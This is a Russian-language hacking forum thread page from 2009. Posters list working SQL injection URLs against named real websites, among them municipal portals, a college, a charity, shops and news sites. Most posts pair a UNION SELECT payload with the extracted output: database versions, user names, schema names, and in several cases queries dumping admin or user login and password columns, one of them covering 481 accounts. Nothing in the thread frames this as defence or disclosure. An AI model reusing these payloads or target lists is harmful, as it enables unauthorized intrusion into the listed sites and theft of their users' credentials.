ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11241  
Старый 15.11.2009, 00:45
edge911
Участник форума
Регистрация: 21.02.2009
Сообщений: 228
Провел на форуме:
2175726

Репутация: 368
По умолчанию

MSsql
PR 5
Цитата:
http://www.kajaaninteatteri.fi/index.asp?pid=447%27+or+447=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+(%27www_menusettings%27,%27dtproperties%27 ,%27postituslista_asetukset%27,%27postituslista_as iakkaat%27,%27postituslista_lahetykset%27,%27posti tuslista_ryhmat%27,%27postituslista_sivupohjat%27, %27sysconstraints%27,%27syssegment%27,%27syssegmen ts%27,%27www_area%27,%27www_clientsettings%27,%27w ww_counter%27))%20--
Цитата:
http://www.sotkamo.fi/index.asp?pid=285%27+or+285=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+(%27auutiset_alueet%27,%27yritysrekisteri% 27,%27auutiset_uutiset%27,%27www_area%27))%20--
 
Ответить с цитированием

  #11242  
Старый 15.11.2009, 01:44
Gaus
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275

Репутация: 127
Smile

PR4
Код:
http://www.natural-insect-control.com/product.php?id=000000283+and+1=0+union+select+1,concat_ws(0x3a,User,Password),3,4+from+mysql.user--
version: 5.0.77-log
user: root@localhost
database: naturalinsect
PR2
Код:
http://www.ldicolortoolbox.com/product.php?id=98&cid=30+and+1=0+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--
version: 4.1.20
user: dang@localhost
database: ldi

Последний раз редактировалось Gaus; 15.11.2009 в 12:29..
 
Ответить с цитированием

  #11243  
Старый 15.11.2009, 12:29
Gaus
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275

Репутация: 127
По умолчанию

PR6
Код:
http://www.mercurymarine.com/newsandevents/newsdetail.php?ID=20+and+1=0+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
4.1.21:mercury@localhost:mercurymarine
PR5
Код:
http://www.adventureplus-bg.com/story.php?id=21+and+1=0+union+select+concat_ws(0x3a,version(),user(),database())--
4.0.26a:top@sg-acd12:top
PR5
Код:
http://channelstv.com/prog_transcript.php?id=34+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5--
4.1.22-log:channels_user@67.205.111.186:channels
PR5
Код:
http://www.digital-everywhere.com/shop/index.php?page=artikel&pkateg=20+and+1=0+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5--
4.1.22-standard-log:db188898_1@local2:db188898_1
PR4
Код:
http://www.digital-everywhere.com/shop/index.php?page=artikel&pkateg=20+and+1=0+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5--
4.1.22-standard-log:db188898_1@local2:db188898_1
PR4
Код:
http://www.game-reviews.ca/news.php?id=1422+and+1=0+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,10,11+from+admin--
5.0.67-standard:gamerevi_news@localhost:gamerevi_gamenews
PR3
Код:
http://www.adventureplus-bg.com/story.php?id=21+and+1=0+union+select+concat_ws(0x3a,version(),user(),database())--
4.0.26a:top@sg-acd12:top
PR3
Код:
http://juggler.artinact.com/a-imglib/showimg.php?id=15+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8--
4.1.22-standard-log:artinact_juggler@localhost:artinact_juggler
PR3
Код:
http://fitnessbuildshealth.com/trainers.php?id=39+and+1=0+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16--
4.1.20-max-log:start6_ray@71.18.216.33:start6_fit

Последний раз редактировалось Gaus; 15.11.2009 в 14:08..
 
Ответить с цитированием

  #11244  
Старый 15.11.2009, 13:34
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код:
http://ukrturizm.com.ua/index.php?id=-293+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7--
4.1.25-log:atur@localhost:atur

Код:
http://www.tsetse220.com/news.php?id=-142+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5--
5.0.51a-3ubuntu5.4:root@localhost:tsetse220

Код:
http://www.otcheta.net/news.php?id=13005+and+substring%28version%28%29,1,1%29=4
version: 4.1.25-log
 
Ответить с цитированием

  #11245  
Старый 15.11.2009, 20:19
hack-win32
Познающий
Регистрация: 11.10.2009
Сообщений: 33
Провел на форуме:
88588

Репутация: 99
По умолчанию

db9330@64.13.192.28:db9330_blog:4.1.25-Debian_mt1
Код:
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47--

codeglue2@WSWWW07:codeglue2:5.0.85-community-nt
Код:
http://www.codeglue.com/game.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

rpgui@localhost:RPGuides:5.0.51a-3ubuntu5.4
Код:
http://www.rpguides.de/dnd/game.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),database(),version()),14,15--
 
Ответить с цитированием

  #11246  
Старый 16.11.2009, 04:21
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

http://www.rav.org/upper/newsDetail.php?id=170+union+select+1,2,3,4,5,6,7,8 ,9,10--

user:sql@maimonides.org@207.155.252.14
base:maimoDB
os:sun-solaris2.8
mysql.user:sql@maimonides.org

file_priv:N
ver:4.1.22-log

[ id,username,pwd ] from [ users ]
-----------------------------------------

Последний раз редактировалось jokester; 16.11.2009 в 11:41.. Причина: пароли
 
Ответить с цитированием

  #11247  
Старый 16.11.2009, 12:50
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.cg.com.ve/noticia.php?id=-222+union+select+1,concat_ws(0x3a3a,login,contrase na,nombre),3,4,5,6,7,8,9,10,11,12+from+usuarios+li mit+2,1+/*+


http://www.pepedoro.it/pepedoroblog/magazine.php?acts=report&id=-79'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17+/*+


http://www.spotbit.com/main/inside_search.php?&title=6&memberid=-2278+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103+/*+
 
Ответить с цитированием

  #11248  
Старый 16.11.2009, 15:26
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

ням,но сцк не фартит..
Цитата:
http://www.kishwaukeecollege.edu/athletics/player.shtml?id=-216+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19/*
Db: internet
Version: 4.1.22-log
User: interusr@webserver
 
Ответить с цитированием

  #11249  
Старый 16.11.2009, 18:39
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863

Репутация: 80
По умолчанию

openheartsopenminds.org.uk

Код:
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,version(),5,6+--+
Version: 5.0.45-community-nt
Database: sitesplus
User: sitesplus@localhost

Таблицы:
Код:
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,table_name,5,6+from+information_schema.tables+limit+0,1+--+
Присутствует таблица tb_users, столбцы:
user_id
site_id
user_name
user_password
expired

Код:
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,concat(user_name,0x5A,user_password),5,6+from+tb_users+limit+0,1+--+

Всего 481 аккаунт.
 
Ответить с цитированием

  #11250  
Старый 16.11.2009, 19:57
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

MySQL 5.0.45-community-log
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x6d656d6265 72--
member::m_id,m_name,m_subscribed,m_unsubscribed,m_ email
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,concat_ws(0x0b,m_id,0x3a,m_name ,0x3a,m_subscribed,0x3a,m_unsubscribed,0x3a,m_emai l),4,5,6,7+from+member--
выводит все строки сразу.
Вывод ошибок отключен.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ